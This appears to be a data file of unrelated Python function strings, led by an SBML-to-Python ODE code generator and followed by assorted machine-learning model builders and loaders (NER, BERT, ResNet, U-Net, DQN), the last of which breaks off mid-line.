for reactant in reaction.reactants:\n if reactant[1] not in reactantIndex:\n reactantIndex[reactant[1]] = reactantCounter\n reactantCounter += 1\n if not (species[reactant[1]].isBoundarySpecies == \"True\"):\n stoichCoeffMat[reactantIndex[reactant[1]], reactionIndex[rxnId]] += reactant[0]\n\n \t\n # for reaction in reactions:\n # for reactant in reactions[reaction][0]:\n # if reactant[1] not in reactantIndex:\n # reactantIndex[reactant[1]] = reactantCounter\n # reactantCounter += 1\n # if not species[reactant[1]][4]:\n # stoichCoeffMat[reactantIndex[reactant[1]], reaction-1] += reactant[0]\n #print(rateParams)\n #print(stoichCoeffMat)\n \n outputFile.write(\"from sbmltopyode.SBMLModelClasses import *\\n\")\n outputFile.write(\"from scipy.integrate import odeint\\n\")\n outputFile.write(\"import numpy as np\\n\")\n outputFile.write(\"import operator\\n\")\n outputFile.write(\"import math\\n\\n\")\n \n outputFile.write(\"class \" + objectName +\":\\n\\n\")\n \n outputFile.write(\"\\tdef __init__(self):\\n\\n\")\n outputFile.write(\"\\t\\tself.p = {} #Dictionary of model parameters\\n\")\n for paramId in parameters:\n outputFile.write(\"\\t\\tself.p[\\'\" + paramId + \"\\'] = Parameter(\" + str(parameters[paramId].value)+ \", \\'\"+ paramId + \"\\', \" + str(parameters[paramId].isConstant) +\")\\n\")\n \n outputFile.write(\"\\n\\t\\tself.c = {} #Dictionary of compartments\\n\")\n for compartmentId in compartments:\n outputFile.write(\"\\t\\tself.c[\\'\" + compartmentId + \"\\'] = Compartment(\" + str(compartments[compartmentId].size) + \", \" + str(compartments[compartmentId].dimensionality)+ \", \" + str(compartments[compartmentId].isConstant) + \")\\n\")\n \n outputFile.write(\"\\n\\t\\tself.s = {} #Dictionary of chemical species\\n\")\n for speciesId in species:\n outputFile.write(\"\\t\\tspeciesMetadata = SBMLMetadata('\" + species[speciesId].name +\"')\\n\")\n outputFile.write(\"\\t\\tself.s[\\'\" + speciesId + \"\\'] = Species(\" + str(species[speciesId].value) + \", '\" + species[speciesId].valueType + \"', self.c['\" + species[speciesId].compartment + \"'], \" + str(species[speciesId].hasOnlySubstanceUnits) + \", constant = \" + str(species[speciesId].isConstant) + \")\\n\")\n for key, rule in assignmentRules.items():\n if rule.variable == speciesId:\n outputFile.write(\"\\t\\tself.s[\\'\" + speciesId + \"\\']._modifiedBy = \" + rule.Id + \"\\n\")\n for key, rule in rateRules.items():\n if rule.variable == speciesId:\n outputFile.write(\"\\t\\tself.s[\\'\" + speciesId + \"\\']._modifiedBy = \" + rule.Id + \"\\n\")\n \n \n outputFile.write(\"\\n\\t\\tself.r = {} #Dictionary of reactiions\\n\")\n for reactionId in reactions:\n outputFile.write(\"\\t\\tself.r[\\'\" + reactionId + \"\\'] = \" + reactionId + \"(self, SBMLMetadata('\" + reactions[reactionId].name + \"'))\\n\")\n \n outputFile.write(\"\\t\\tself.time = 0\\n\\n\")\n \n outputFile.write(\"\\t\\tself.reactionMetadata = {\")\n commaFlag = 0\n for reactionId in reactions:\n if commaFlag == 0:\n commaFlag = 1\n outputFile.write(\"\\n\\t\\t\")\n else:\n outputFile.write(\",\\n\\t\\t\")\n outputFile.write(\"self.Reaction\" + reactionId + \": SBMLMetadata('\" + reactions[reactionId].name + \"')\")\n outputFile.write(\"\\n\\t\\t}\\n\")\n \n outputFile.write('\\t\\tself.AssignmentRules()\\n\\n')\n \n outputFile.write(\"\\n\\n\")\n outputFile.write(\"\\tdef AssignmentRules(self):\\n\\n\")\n #These functions are defined here due to reading variables in the parent function's namespace\n #These are not intended to be used elsewhere\n def ParseLHS(rawLHS):\n returnLHS = ''\n if rawLHS in parameters:\n returnLHS = \"self.p[\\'\" + rawLHS + \"\\'].value = \"\n elif rawLHS in species:\n if not species[rawLHS].hasOnlySubstanceUnits: \n returnLHS = 'self.s[\\'' + rawLHS + '\\'].concentration = '\n else: \n returnLHS = 'self.s[\\'' + rawLHS + '\\'].amount = '\n elif rawLHS in compartments:\n returnLHS = 'self.c[\\'' + rawLHS + '\\'].size = '\n else:\n raise(Exception(\"New case: rule LHS not in p: \" + rawLHS))\n\n return returnLHS\n\t\n def ParseRHS(rawRHS, extendedParams = [], objectText = \"self\"):\n #objectText is not \"self\" when parsing reaction math\n \n #The main purpose of this function is to turn math strings given by libSBML into\n #code formated to properly call members of the resulting class\n #For example k_1*C_A may turn to\n \n \n rawRHS = rawRHS.replace(\"^\", \"**\") #Replaces carrot notation for exponentiation with ** operator\n variables = []\n for match in re.finditer(r'\\b[a-zA-Z_]\\w*', rawRHS): #look for variable names\n #ToDo: check for function calls\n variables.append([rawRHS[match.start():match.end()], match.span()])\n \n #rule[1] contains the right hand side\n returnRHS = ''\n oldSpan = None\n if variables != []:\n for variable in variables:\n if oldSpan == None and variable[1][0] != 0:\n returnRHS += rawRHS[0:variable[1][0]]\n elif oldSpan != None:\n returnRHS += rawRHS[oldSpan[1]:variable[1][0]]\n oldSpan = variable[1]\n if variable[0] in parameters:\n returnRHS += objectText + '.p[\\'' + variable[0] + '\\'].value'\n elif variable[0] in species:\n if not species[variable[0]].hasOnlySubstanceUnits == \"True\": \n returnRHS += objectText + '.s[\\'' + variable[0] + '\\'].concentration'\n else: \n returnRHS += objectText + '.s[\\'' + variable[0] + '\\'].amount'\n elif variable[0] in compartments:\n returnRHS += objectText + '.c[\\'' + variable[0] + '\\'].size'\n elif variable[0] in mathFuncs:\n returnRHS += mathFuncs[variable[0]]\n elif variable[0] in functions:\n returnRHS += objectText + '.' + variable[0]\n elif variable[0] in extendedParams:\n if objectText == \"self\":\n returnRHS += variable[0]\n else:\n returnRHS += \"self.p[\\'\" + variable[0] + \"\\'].value\"\n\n elif variable[0] == \"time\":\n returnRHS += objectText + '.time'\n elif variable[0] == \"pi\":\n returnRHS += \"np.pi\"\n else:\n raise(Exception('New case: unkown RHS variable: ' + variable[0]))\n returnRHS += rawRHS[variable[1][1]:len(rawRHS)]\n # print(rule[1][variable[1][1]])\n #print(rule[1][-1])\n else:\n returnRHS = rawRHS\n\t\t\n return returnRHS\n\n ruleDefinedVars = [rule.variable for rule in assignmentRules.values()]\n for key, assignment in initialAssignments.items():\n ruleDefinedVars.append(assignment.variable)\n \n for key, rule in assignmentRules.items():\n rule.dependents = []\n for match in re.finditer(r'\\b[a-zA-Z_]\\w*', rule.math): #look for variable names\n rule.dependents.append(rule.math[match.start():match.end()])\n originalLen = len(rule.dependents)\n for i in range(originalLen):\n if rule.dependents[originalLen - i -1] not in ruleDefinedVars:\n rule.dependents.pop(originalLen- i-1)\n \n for key, assignment in initialAssignments.items():\n assignment.dependents = []\n for match in re.finditer(r'\\b[a-zA-Z_]\\w*', assignment.math): #look for variable names\n assignment.dependents.append(assignment.math[match.start():match.end()])\n originalLen = len(assignment.dependents)\n for i in range(originalLen):\n if assignment.dependents[originalLen - i -1] not in ruleDefinedVars :\n assignment.dependents.pop(originalLen- i-1)\n \n# breakVar = False\n while True:\n continueVar = False\n breakVar = True\n varDefinedThisLoop = None\n for key, rule in assignmentRules.items():\n if rule.dependents == []:\n ruleLHS = ParseLHS(rule.variable)\n ruleRHS = ParseRHS(rule.math)\n outputFile.write(\"\\t\\t\" + ruleLHS + ruleRHS + '\\n\\n')\n varDefinedThisLoop = rule.variable\n rule.dependents = None\n continueVar = True\n breakVar = False\n break\n elif not rule.dependents == None:\n breakVar = False\n \n if not continueVar:\n for key, assignment in initialAssignments.items():\n if assignment.dependents == []:\n assignmentLHS = ParseLHS(assignment.variable)\n assignmentRHS = ParseRHS(assignment.math)\n outputFile.write(\"\\t\\tif self.time <= 0 :\\n\")\n if assignment.variable in parameters:\n outputFile.write(\"\\t\\t\\tisConstantValue = self.p['\" + assignment.variable + \"']._constant\\n\")\n outputFile.write(\"\\t\\t\\tself.p['\" + assignment.variable + \"']._constant = False\\n\")\n outputFile.write(\"\\t\\t\\t\" + assignmentLHS + assignmentRHS + '\\n')\n outputFile.write(\"\\t\\t\\tself.p['\" + assignment.variable + \"']._constant = isConstantValue\\n\\n\")\n elif assignment.variable in species:\n outputFile.write(\"\\t\\t\\tisConstantValue = self.s['\" + assignment.variable + \"']._constant\\n\")\n outputFile.write(\"\\t\\t\\tself.s['\" + assignment.variable + \"']._constant = False\\n\")\n outputFile.write(\"\\t\\t\\t\" + assignmentLHS + assignmentRHS + '\\n')\n outputFile.write(\"\\t\\t\\tself.s['\" + assignment.variable + \"']._constant = isConstantValue\\n\\n\")\n elif assignment.variable in compartment:\n outputFile.write(\"\\t\\t\\tisConstantValue = self.c['\" + assignment.variable + \"']._constant\\n\")\n outputFile.write(\"\\t\\t\\tself.c['\" + assignment.variable + \"']._constant = False\\n\")\n outputFile.write(\"\\t\\t\\t\" + assignmentLHS + assignmentRHS + '\\n')\n outputFile.write(\"\\t\\t\\tself.c['\" + assignment.variable + \"']._constant = isConstantValue\\n\\n\")\n \n varDefinedThisLoop = assignment.variable\n assignment.dependents = None\n continueVar = True\n breakVar = False\n break\n elif not rule.dependents == None:\n breakVar = False\n \n for rule in assignmentRules.values():\n if not rule.dependents == None:\n originalLen = len(rule.dependents)\n for i in range(originalLen):\n if rule.dependents[originalLen - i -1] == varDefinedThisLoop:\n rule.dependents.pop(originalLen - i -1)\n# print(rule.variable + ':' + str(rule.dependents))\n\n for assignment in initialAssignments.values():\n if not assignment.dependents == None:\n originalLen = len(assignment.dependents)\n for i in range(originalLen):\n if assignment.dependents[originalLen - i - 1] == varDefinedThisLoop:\n assignment.dependents.pop(originalLen - i - 1)\n# print(assignment.variable + ':' + str(assignment.dependents))\n \n if continueVar:\n continue\n elif breakVar:\n break\n else:\n raise Exception('Algebraic Loop in AssignmentRules')\n \n outputFile.write(\"\\t\\treturn\\n\\n\")\n \n for functionId in functions:\n arguments = functions[functionId].arguments\n argumentString = \"\"\n for i in range(len(arguments)):\n argumentString += arguments[i]\n if i != len(arguments) - 1:\n argumentString += \", \"\n \n outputFile.write(\"\\tdef \" + functionId + \"(self, \" + argumentString + \"):\\n\")\n outputFile.write(\"\\t\\treturn \" + functions[functionId].mathString.replace(\"^\", \"**\") + \"\\n\")\n \n for reactionId in reactions:\n outputFile.write(\"\\tdef Reaction\" + str(reactionId) + \"(self):\\n\\n\")\n\n rxnParameters = []\n for param in reactions[reactionId].rxnParameters:\n outputFile.write(\"\\t\\t\" + param[0] + \" = \" + str(param[1]) + \"\\n\")\n rxnParameters.append(param[0])\n\t\t\t\n rateLaw = ParseRHS(reactions[reactionId].rateLaw, rxnParameters)\n \n outputFile.write('\\t\\treturn ' + rateLaw + '\\n\\n')\n\n rateRuleLHSVars = []\n for key, rateRule in rateRules.items():\n rateRuleLHSVars.append(rateRule.variable)\n outputFile.write(\"\\tdef Rate\" + rateRule.variable + \"(self):\\n\\n\")\n rateLaw = ParseRHS(rateRule.math)\n outputFile.write('\\t\\treturn ' + rateLaw + '\\n\\n')\n \n yArray = ''\n i = 0\n yArrayVars = [0 for x in range(len(species) + rateParams)]\n for variable, index in reactantIndex.items():\n yArrayVars[index] = variable\n \n for index in range(len(yArrayVars)):\n # print(yArrayVars[index])\n if index != 0:\n yArray += ', '\n \n if yArrayVars[index] in species:\n yArray += 'self.s[\\'' + yArrayVars[index] + '\\'].amount'\n continue\n \n if yArrayVars[index] in parameters:\n yArray += 'self.p[\\'' + yArrayVars[index] + '\\'].value'\n continue\n \n if yArrayVars[index] in compartments:\n yArray += 'self.c\\'' + yArrayVars[index] + '\\'].size'\n continue\n \n\n \n outputFile.write('\\tdef _SolveReactions(self, y, t):\\n\\n')\n outputFile.write('\\t\\tself.time = t\\n')\n outputFile.write('\\t\\t' + yArray + ' = y\\n')\n outputFile.write('\\t\\tself.AssignmentRules()\\n\\n')\n# outputFile.write('\\t\\t[self.s[speciesId].UpdateCompartmentSizeMember() for speciesId in self.s]\\n')\n rateArray = '[ '\n i = 0\n rateArrayVars = [0 for x in range(len(species) + rateParams)]\n \n for variable, index in reactantIndex.items():\n if variable in rateRuleLHSVars:\n rateArrayVars[index] = variable\n \n\n \n for variable in rateArrayVars:\n if i != 0:\n rateArray += ', '\n i += 1\n if variable == 0:\n rateArray += '0'\n else:\n rateArray += 'self.Rate' + variable + '()'\n \n \n \n \n rateArray += ']'\n outputFile.write('\\t\\trateRuleVector = np.array(' + str(rateArray) + ', dtype = np.float64)\\n\\n') \n \n outputFile.write('\\t\\tstoichiometricMatrix = np.array(' + re.sub('\\n,', ',\\n\\t\\t\\t\\t\\t', re.sub('[^[] +', ',' ,str(stoichCoeffMat))) + ', dtype = np.float64)\\n\\n')\n outputFile.write('\\t\\treactionVelocities = np.array([')\n reactionElements = ''\n if reactions:\n for reactionId in reactions:\n if reactionElements == '':\n reactionElements += ('self.r[\\'' + str(reactionId) + '\\']()')\n else:\n reactionElements += (', self.r[\\'' + str(reactionId) + '\\']()')\n else:\n reactionElements = '0'\n outputFile.write(reactionElements + '], dtype = np.float64)\\n\\n')\n outputFile.write('\\t\\trateOfSpeciesChange = stoichiometricMatrix @ reactionVelocities + rateRuleVector\\n\\n')\n outputFile.write('\\t\\treturn rateOfSpeciesChange\\n\\n')\n \n outputFile.write('\\tdef RunSimulation(self, deltaT, absoluteTolerance = 1e-12, relativeTolerance = 1e-6):\\n\\n')\n \n outputFile.write('\\t\\tfinalTime = self.time + deltaT\\n')\n outputFile.write('\\t\\ty0 = np.array([' + yArray + '], dtype = np.float64)\\n')\n outputFile.write('\\t\\t' + yArray + ' = odeint(self._SolveReactions, y0, [self.time, finalTime], atol = absoluteTolerance, rtol = relativeTolerance, mxstep=5000000)[-1]\\n')\n outputFile.write('\\t\\tself.time = finalTime\\n')\n outputFile.write('\\t\\tself.AssignmentRules()\\n')\n# outputFile.write('\\t\\t[self.s[speciesId].UpdateCompartmentSizeMember() for speciesId in self.s]\\n')\n outputFile.write('\\n')\n \n for key in reactions.keys():\n outputFile.write('class ' + key + ':\\n\\n')\n outputFile.write('\\tdef __init__(self, parent, metadata = None):\\n\\n')\n outputFile.write('\\t\\tself.parent = parent\\n')\n outputFile.write('\\t\\tself.p = {}\\n')\n outputFile.write('\\t\\tself.metadata = metadata\\n\\n')\n for param in reactions[key].rxnParameters:\n outputFile.write(\"\\t\\tself.p[\\'\" + param[0] + \"\\'] = Parameter(\" + str(param[1]) + \", '\" + param[0] + \"')\\n\")\n #\"\\t\\tself.p[\\'\" + paramId + \"\\'] = Parameter(\" + str(parameters[paramId].value)+ \", \"+ paramId + \", \" + str(parameters[paramId].isConstant) +\")\\n\"\n \n outputFile.write('\\n\\tdef __call__(self):\\n')\n# print(key)\n# print(reactions[key].rxnParameters)\n rxnParamNames = [param[0] for param in reactions[key].rxnParameters]\n rateLaw = ParseRHS(reactions[key].rateLaw, rxnParamNames, \"self.parent\")\n outputFile.write('\\t\\treturn ' + rateLaw + '\\n\\n')\n\n \n for key in functions.keys():\n outputFile.write('class ' + key + ':\\n\\n')\n outputFile.write('\\tdef __init__(self, parent, metadata = None):\\n\\n')\n outputFile.write('\\t\\tself.parent = parent\\n')\n outputFile.write('\\t\\tself.metadata = metadata\\n\\n')\n\n arguments = functions[key].arguments\n argumentString = \"\"\n for i in range(len(arguments)):\n argumentString += arguments[i]\n if i != len(arguments) - 1:\n argumentString += \", \"\n \n outputFile.write('\\tdef __call__(self, ' + argumentString + '):\\n')\n outputFile.write(\"\\t\\treturn \" + functions[key].mathString.replace(\"^\", \"**\") + \"\\n\\n\")\n\n outputFile.close()", "def build_model(cfg, char_voca, word_voca=None, gazet=None, pos_voca=None):\n\n # Build Embedder\n embedder = Embedder(\n window=cfg.window,\n char_voca=char_voca,\n word_voca=word_voca,\n jaso_dim=cfg.jaso_dim,\n char_dim=cfg.char_dim,\n word_dim=cfg.word_dim,\n gazet=gazet,\n gazet_embed=True,\n pos_enc=True,\n phoneme=True,\n pos_voca_size=len(pos_voca),\n pos_dim=cfg.pos_dim)\n\n print('Total Embedding_size: ', embedder.embed_dim)\n\n\n encoder_name, decoder_name = cfg.model_name.lower().split('-')\n\n # Build Encoder\n if encoder_name == 'fnn5':\n encoder = models.Fnn5(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif encoder_name == 'cnn7':\n encoder = models.Cnn7(in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif encoder_name == 'cnn8':\n encoder = models.Cnn8(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif encoder_name in ['gru', 'lstm', 'sru']:\n encoder = models.RnnEncoder(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n out_dim=cfg.hidden_dim,\n cell=encoder_name)\n else:\n raise ValueError('unknown model name: %s' % cfg.model_name)\n\n # Build Decoder\n if decoder_name.lower() == 'fc':\n decoder = models.FCDecoder(in_dim=encoder.out_dim,\n hidden_dim=cfg.hidden_dim,\n n_tags=cfg.n_tags)\n elif decoder_name in ['gru', 'lstm', 'sru']:\n decoder = models.RnnDecoder(in_dim=encoder.out_dim,\n hidden_dim=cfg.hidden_dim,\n n_tags=cfg.n_tags,\n num_layers=cfg.num_layers,\n cell=decoder_name)\n\n model = models.Ner(embedder, encoder, decoder)\n\n return model", "def model_fn(model_dir):\n \n model = resnet18Basic(num_classes=10)\n net.load_params('%s/model.params' % model_dir, ctx=mx.cpu())\n return net", "def __call__(self, x: Tensor, model: Module, gt_y: Tensor):\n prediction = model(x)\n return self.weight * self.norm(prediction, gt_y)", "def build_model(self):\n pass", "def build_model(self):\n pass", "def init_model(model_type):\n if model_type == 'magnitude':\n model = Magnitude('../model/crawl-300d-2M.magnitude')\n elif model_type == 'gensim':\n model = KeyedVectors.load('../model/pre_trained_word2vec_embeddings.bin')\n else:\n print(\"Invalid model type.\")\n sys.exit(1)\n return model, model_type", "def _parse_model(model: str, num_classes: int) -> Callable[[], tf.keras.Model]:\n if model == 'cnn':\n keras_model_builder = functools.partial(\n create_conv_dropout_model, num_classes=num_classes)\n elif model in ['resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152']:\n keras_model_builder = functools.partial(\n getattr(resnet_models, f'create_{model}'),\n input_shape=(28, 28, 1),\n num_classes=num_classes)\n else:\n raise ValueError(\n 'Cannot handle model flag [{!s}], must be one of {!s}.'.format(\n model, _EMNIST_MODELS))\n return keras_model_builder", "def model_fn(features, labels, mode, params): # pylint: disable=unused-argument\n\n tf.logging.info(\"*** Features ***\")\n for name in sorted(features.keys()):\n tf.logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n # INFO:tensorflow: name = input_ids, shape = (?, 180)\n # INFO:tensorflow: name = input_mask, shape = (?, 180)\n # INFO:tensorflow: name = is_real_example, shape = (?,)\n # INFO:tensorflow: name = label_ids, shape = (?,)\n # INFO:tensorflow: name = masked_lm_ids, shape = (?, 180)\n # INFO:tensorflow: name = masked_lm_positions, shape = (?, 180)\n # INFO:tensorflow: name = masked_lm_weights, shape = (?, 180)\n # INFO:tensorflow: name = segment_ids, shape = (?, 180)\n\n input_ids = features[\"input_ids\"]\n input_mask = features[\"input_mask\"]\n segment_ids = features[\"segment_ids\"]\n masked_lm_positions = features[\"masked_lm_positions\"]\n masked_lm_ids = features[\"masked_lm_ids\"]\n masked_lm_weights = features[\"masked_lm_weights\"]\n #next_sentence_labels = features[\"next_sentence_labels\"]\n \n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n\n model = modeling.BertModel(\n config=bert_config,\n is_training=is_training,\n input_ids=input_ids,\n input_mask=input_mask,\n token_type_ids=segment_ids,\n use_one_hot_embeddings=use_one_hot_embeddings)\n \n gcn_embedding = build_gcn_output(adj_mat, w2n, n2w, model.get_embedding_table(), bert_config, is_training)\n \n (masked_lm_loss,\n masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output(\n bert_config, model.get_sequence_output(), gcn_embedding,\n masked_lm_positions, masked_lm_ids, masked_lm_weights)\n\n\n masked_lm_loss = tf.identity(masked_lm_loss, name=\"masked_lm_loss\")\n\n\n total_loss = masked_lm_loss\n\n total_loss = tf.identity(total_loss, name='total_loss')\n\n tvars = tf.trainable_variables()\n\n initialized_variable_names = {}\n scaffold_fn = None\n if init_checkpoint and (not FLAGS.use_horovod or hvd.rank() == 0):\n (assignment_map, initialized_variable_names\n ) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n if use_tpu:\n\n def tpu_scaffold():\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n return tf.train.Scaffold()\n\n scaffold_fn = tpu_scaffold\n else:\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n\n if not FLAGS.use_horovod or hvd.rank() == 0:\n tf.logging.info(\"**** Trainable Variables ****\")\n for var in tvars:\n init_string = \"\"\n if var.name in initialized_variable_names:\n init_string = \", *INIT_FROM_CKPT*\"\n tf.logging.info(\" name = %s, shape = %s%s\", var.name, var.shape,\n init_string)\n\n output_spec = None\n if mode == tf.estimator.ModeKeys.TRAIN:\n train_op = optimization.create_optimizer(\n total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu, FLAGS.use_horovod)\n\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n loss=total_loss,\n train_op=train_op)\n return output_spec\n elif mode == tf.estimator.ModeKeys.PREDICT:\n\n #def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,\n # masked_lm_weights):#, next_sentence_example_loss,\n #next_sentence_log_probs, next_sentence_labels):\n \"\"\"Computes the loss and accuracy of the model.\"\"\"\n #masked_lm_log_probs = tf.reshape(masked_lm_log_probs,\n # [-1, masked_lm_log_probs.shape[-1]])\n masked_lm_predictions = tf.argmax(\n masked_lm_log_probs, axis=-1, output_type=tf.int32)\n # values=next_sentence_example_loss)\n\n predictions = {\n \"input_ids\": tf.reshape(input_ids, [-1]),\n \"predictions\": masked_lm_log_probs\n }\n\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions)\n #eval_metric_ops=eval_metrics)\n return output_spec\n else:\n def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,\n masked_lm_weights):\n \"\"\"Computes the loss and accuracy of the model.\"\"\"\n masked_lm_log_probs = tf.reshape(masked_lm_log_probs,\n [-1, masked_lm_log_probs.shape[-1]])\n masked_lm_predictions = tf.argmax(\n masked_lm_log_probs, axis=-1, output_type=tf.int32)\n masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])\n masked_lm_ids = tf.reshape(masked_lm_ids, [-1])\n masked_lm_weights = tf.reshape(masked_lm_weights, [-1])\n masked_lm_accuracy = tf.metrics.accuracy(\n labels=masked_lm_ids,\n predictions=masked_lm_predictions,\n weights=masked_lm_weights)\n masked_lm_mean_loss = tf.metrics.mean(\n values=masked_lm_example_loss, weights=masked_lm_weights)\n\n return {\n \"masked_lm_accuracy\": masked_lm_accuracy,\n \"masked_lm_loss\": masked_lm_mean_loss,\n }\n\n eval_metrics = metric_fn(\n masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,\n masked_lm_weights)\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n loss=total_loss,\n eval_metric_ops=eval_metrics)\n\n return output_spec", "def model_fn_builder(model_config,\n train_params):\n def model_fn(features, labels, mode, params):\n \"\"\"The `model_fn` for TPUEstimator.\"\"\"\n logging.info(\"*** Features ***\")\n for name in sorted(features.keys()):\n logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n\n input_ids = features[\"input_ids\"]\n input_mask = features[\"input_mask\"]\n segment_ids = features[\"segment_ids\"]\n masked_lm_positions = features[\"masked_lm_positions\"]\n masked_lm_ids = features[\"masked_lm_ids\"]\n masked_lm_weights = features[\"masked_lm_weights\"]\n\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n\n model = getattr(models, model_config.model_name)(config=model_config,\n is_training=is_training)\n _ = model(input_ids, input_mask=input_mask, token_type_ids=segment_ids)\n\n # TODO (@zhaoshenjian.01): check conditional_jit_scope\n # split loss calculation across batch\n batch_splits = train_params.get(\"batch_splits\", 1)\n if batch_splits == 1:\n # sparse_softmax_cross_entropy_with_logits\n masked_lm_output_dict = get_masked_lm_output(model_config,\n model.get_sequence_output(),\n model.get_embedding_table(),\n masked_lm_positions,\n masked_lm_ids,\n masked_lm_weights)\n else:\n # use for large vocab\n masked_lm_output_dict = get_masked_lm_output_split_batch(\n model_config,\n model.get_sequence_output(),\n model.get_embedding_table(),\n masked_lm_positions,\n masked_lm_ids,\n masked_lm_weights,\n batch_splits=batch_splits)\n\n masked_lm_loss = masked_lm_output_dict[\"loss\"]\n\n use_nsp = train_params.get(\"use_nsp\", True)\n if use_nsp:\n next_sentence_labels = features[\"next_sentence_labels\"]\n next_sentence_output_dict = get_next_sentence_output(\n model_config, model.get_pooled_output(), next_sentence_labels)\n next_sentence_loss = next_sentence_output_dict[\"loss\"]\n else:\n next_sentence_loss = 0\n\n total_loss = masked_lm_loss + next_sentence_loss\n\n tvars = tf.compat.v1.trainable_variables()\n # run init\n init_checkpoint = train_params.get(\"init_checkpoint\")\n initialized_variable_names = {}\n scaffold_fn = None\n if init_checkpoint:\n (assignment_map,\n initialized_variable_names) = get_assignment_map_from_checkpoint(\n tvars, init_checkpoint)\n tf.compat.v1.train.init_from_checkpoint(init_checkpoint, assignment_map)\n\n def tpu_scaffold():\n tf.train.init_from_checkpoint(init_checkpoint,\n assignment_map)\n return tf.train.Scaffold()\n scaffold_fn = tpu_scaffold\n logging.info(\"**** Trainable Variables ****\")\n for var in tvars:\n init_string = \"\"\n if var.name in initialized_variable_names:\n init_string = \", *INIT_FROM_CKPT*\"\n logging.info(\" name = {}, shape = {} {}\".format(var.name, var.shape,\n init_string))\n\n # default `bert_decay` lr_scheduler\n lr_params = train_params.get(\n 'lr_scheduler', {\n 'name': 'bert_decay',\n 'learning_rate': 1e-4,\n 'warmup_steps': 10000,\n 'num_train_steps': 1000000\n })\n if mode == tf.estimator.ModeKeys.TRAIN:\n train_op, _ = optimizers.create_optimizer(\n loss=total_loss,\n init_lr=lr_params['learning_rate'],\n num_train_steps=lr_params['num_train_steps'],\n num_warmup_steps=lr_params['warmup_steps'])\n\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(mode=mode,\n loss=total_loss,\n train_op=train_op,\n scaffold_fn=scaffold_fn)\n return output_spec\n raise NotImplementedError\n\n return model_fn", "def deep_enhance(model: str = 'unet', quantized: bool = False, **kwargs):\n\n model = model.lower()\n if model not in _sampling_availability:\n raise ValueError(\n 'model not supported, please check supported models from `malaya_speech.speech_enhancement.available_deep_enhance()`.'\n )\n\n return unet.load_1d(\n model=model,\n module='speech-enhancement',\n quantized=quantized,\n **kwargs\n )", "def test_model():\n test_text = \"what is the price of jug?\"\n model = spacy.load(\"../model/custom_ner_model\")\n doc = model(test_text)\n for ent in doc.ents:\n print(ent.text, ent.start_char, ent.end_char, ent.label_)", "def predict_api():\n pass", "def __init__(self, model):\n TreeLikelihoodBase.__init__(self, model)", "def create_model(self, fun, kwargs=None, compile=True):\n if kwargs is None:\n kwargs = {}\n\n self.model = fun(self.config.inputs, self.config.output, **kwargs)\n if compile:\n self.model.compile(\n loss=self.config.get_loss(self.modeldir),\n optimizer=\"adam\", metrics=[\"accuracy\"])", "def create_model():\n\n class Net(nn.Cell):\n def construct(self, x, y):\n return x\n\n net = Net()\n model_simple = Model(net)\n\n return model_simple", "def model_fn(model_dir):\n ctx = mx.cpu()\n net = unet.Unet()\n print (\"Loading\", model_dir)\n if path.exists(model_dir+\"/unet_RGB.params\"):\n print (\"Loading RGB Model\")\n net.load_params(model_dir+\"/unet_RGB.params\", ctx)\n print (\"RGB Model Loaded\")\n \n elif path.exists(model_dir+\"/unet_ALL_BANDS.params\"):\n print (\"Loading ALL_BANDS Model\")\n net.load_params(model_dir+\"/unet_ALL_BANDS.params\", ctx)\n print (\"ALL_BANDS Model Loaded\")\n \n else:\n print (\"Model Missing\")\n net=None\n return (net)", "def create_model(self, input_shape, num_actions, mode, args, model_name='q_network'):\n assert (mode in (\"linear\", \"duel\", \"dqn\"))\n with tf.variable_scope(model_name):\n input_data = Input(shape=input_shape, name=\"input\")\n if mode == \"linear\":\n # #version 4 elu:\n # flatten_hidden = Flatten(name=\"flatten\")(input_data)\n # FC_1 = Dense(512, activation='elu', name='FC1-elu')(flatten_hidden)\n # FC_2 = Dense(512, activation='elu', name='FC2-elu')(FC_1)\n # FC_3 = Dense(512, activation='elu', name='FC3-elu')(FC_2)\n # FC_4 = Dense(512, activation='elu', name='FC4-elu')(FC_3)\n # output = Dense(num_actions, activation='elu', name=\"output\")(FC_4)\n\n #version 4 elu:\n flatten_hidden = Flatten(name=\"flatten\")(input_data)\n FC_1 = Dense(1024, activation='elu', name='FC1-elu')(flatten_hidden)\n FC_2 = Dense(1024, activation='elu', name='FC2-elu')(FC_1)\n FC_3 = Dense(1024, activation='elu', name='FC3-elu')(FC_2)\n FC_4 = Dense(512, activation='elu', name='FC4-elu')(FC_3)\n output = Dense(num_actions, activation='elu', name=\"output\")(FC_4)\n\n else:\n if not (args.recurrent):\n # # # version 1:\n # h1 = Convolution2D(32, (8, 8), strides=4, activation=\"relu\", name=\"conv1\")(input_data)\n # h2 = Convolution2D(64, (4, 4), strides=2, activation=\"relu\", name=\"conv2\")(h1)\n # h3 = Convolution2D(64, (3, 3), strides=1, activation=\"relu\", name=\"conv3\")(h2)\n # context = Flatten(name=\"flatten\")(h3)\n\n # # version 2:\n # conv1 = Convolution2D(1, (5, 5), strides=1, activation=\"elu\", name=\"conv1\")(input_data)\n # flatten = Flatten(name=\"flatten\")(conv1)\n # FC_2 = Dense(512, activation='elu', name='FC2-elu')(flatten)\n # context = Dense(512, activation='elu', 